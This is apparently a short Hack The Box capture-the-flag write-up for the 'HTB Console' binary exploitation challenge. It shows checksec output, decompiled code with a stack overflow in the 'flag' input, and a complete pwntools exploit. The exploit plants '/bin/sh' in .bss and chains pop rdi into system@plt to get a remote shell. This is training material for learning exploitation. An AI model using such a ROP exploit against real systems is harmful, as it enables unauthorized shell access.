HTB Console

HTB Console: pwn

Intro to Binary Exploitation htb-pwn

HTB Console.zip

hackthebox

$ file htb-console 
htb-console: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=575e4055094a7f059c67032dd049e4fdbb171266, for GNU/Linux 3.2.0, stripped

$ checksec --file=htb-console 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH  Symbols     FORTIFY Fortified   Fortifiable FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols    No    0       3       htb-console

int __fastcall sub_401201(const char *a1)
{
  int result; // eax
  char s; // [rsp+10h] [rbp-10h]

  if ( !strcmp(a1, "id\n") )
    return puts("guest(1337) guest(1337) HTB(31337)");
  if ( !strcmp(a1, "dir\n") )
    return puts("/home/HTB");
  if ( !strcmp(a1, "flag\n") )
  {
    printf("Enter flag: ");
    fgets(&s, 48, stdin);
    result = puts("Whoops, wrong flag!");
  }
  else if ( !strcmp(a1, "hof\n") )
  {
    puts("Register yourself for HTB Hall of Fame!");
    printf("Enter your name: ");
    fgets(byte_4040B0, 10, stdin);
    result = puts("See you on HoF soon! :)");
  }
  else if ( !strcmp(a1, "ls\n") )
  {
    puts("- Boxes");
    puts("- Challenges");
    puts("- Endgames");
    puts("- Fortress");
    result = puts("- Battlegrounds");
  }
  else if ( !strcmp(a1, "date\n") )
  {
    result = system("date");
  }
  else
  {
    result = puts("Unrecognized command.");
  }
  return result;
}

from the code above we can get some information

"flag"
    fgets(&s, 48, stdin);
...
"hof"
    fgets(byte_4040B0, 10, stdin);
...
"date"
    result = system("date");

we need to know how system is called

...
lea     rdi, [...]    # address that stores parameter, .bss "/bin/sh"
call    system

you can learn about ROP Gadget

from pwn import *

HOST = "159.65.92.13"
PORT = 31150

io = remote(HOST, PORT)
# io = process('./htb-console')

pop_rdi = 0x0401473     # pop rdi; ret
bss_hof = 0x004040b0

# 0x401381      call   0x401040 <system@plt>
system  = 0x401040 # can use 0x401381 or 0x401040

io.recvuntil('>> ')
io.sendline('hof')
payload  = b'/bin/sh'
io.recvuntil('Enter your name: ')
io.sendline(payload)
io.recvuntil('>> ')
io.sendline('flag')
payload  = b'a'*24
payload += p64(pop_rdi)
payload += p64(bss_hof)
payload += p64(system)
io.recvuntil('Enter flag: ')
io.sendline(payload)
io.interactive()